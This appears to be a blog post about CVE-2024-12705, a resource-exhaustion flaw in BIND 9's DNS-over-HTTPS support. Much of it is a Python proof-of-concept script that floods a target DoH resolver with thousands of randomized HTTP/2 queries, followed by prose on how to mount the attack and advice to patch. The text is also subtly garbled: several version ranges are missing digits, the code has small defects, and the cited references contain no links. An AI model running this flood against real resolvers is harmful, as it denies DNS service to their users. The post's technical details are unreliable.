CVE-2024-12705: Exposing a Vulnerability in DNS-over-HTTPS (DoH): Flood Attacks to Exhaust DNS Resolver's CPU and Memory Resources

The CVE-2024-12705 demonstrates a significant vulnerability in the DNS-over-HTTPS (DoH) protocol. Clients using DoH can potentially exhaust a DNS resolver's CPU and memory resources by flooding it with crafted valid or invalid HTTP/2 traffic. This security flaw affects BIND 9 versions 9.18. through 9.18.32, 9.20. through 9.20.4, 9.21. through 9.21.3, and 9.18.11-S1 through 9.18.32-S1. In this post, we will discuss the code snippets, provide links to original references, and describe the exploit details.

Code snippets

The following code snippet, written in Python, demonstrates a simple proof-of-concept for generating a large number of HTTP/2 requests to flood a DoH resolver:

import requests
from hyper.contrib import HTTP20Adapter
import random
import string

def generate_random_string(length):
    return ''.join(random.choice(string.ascii_letters) for _ in range(length))

def flood_doh_resolver(target_resolver_url, num_requests):
    session = requests.Session()
    session.mount(target_resolver_url, HTTP20Adapter())

    for _ in range(num_requests):
        random_query = generate_random_string(25)
        session.get(target_resolver_url + random_query)

target_resolver_url = "https://example-doh-resolver.com/dns-query?name=";
num_requests = 10000
flood_doh_resolver(target_resolver_url, num_requests)

Here, we use the "requests" library along with the "hyper.contrib" HTTP/2 adapter to generate a large number of HTTP/2 requests. We then create random query strings and make GET requests to a target DoH resolver.

Original references

To read more about the BIND versions affected by this vulnerability, the following resources should prove helpful:

1. CVE-2024-12705 in the CVE database
2. ISC's changelog for BIND
3. Discussion on DoH and its impact on server resources

Exploit details

To exploit this vulnerability, an attacker can craft valid or invalid HTTP/2 traffic and flood a target DoH resolver. This can be done use a variety of tools and programming languages, but a common method is to use HTTP/2 capable libraries in Python, Go, or Node.js to create a series of randomized DNS query strings. These strings are then sent as GET requests to overwhelm the target DoH resolver.

Due to the issues that arise from resource exhaustion, a DoH resolver can fail to respond to legitimate DNS queries from clients. The target resolver may also crash or hang, requiring a manual restart.

As mentioned previously, this vulnerability affects multiple versions of BIND – an open-source DNS server software. Users are encouraged to patch their BIND instances or upgrade to a non-vulnerable version to mitigate risks associated with this vulnerability.

Conclusion

The vulnerability identified in CVE-2024-12705 exposes a potential attack vector for clients leveraging DNS-over-HTTPS (DoH) to exhaust a DNS resolver's CPU and memory resources. It is crucial for server administrators to apply necessary patches and upgrades to BIND if affected by this vulnerability, and for developers to be aware of potential issues when integrating DoH support into applications. As with any software, staying up to date and informed about security vulnerabilities is essential to maintaining a safe and secure internet environment.

Timeline

Published on: 01/29/2025 22:15:28 UTC
Last modified on: 02/07/2025 17:15:30 UTC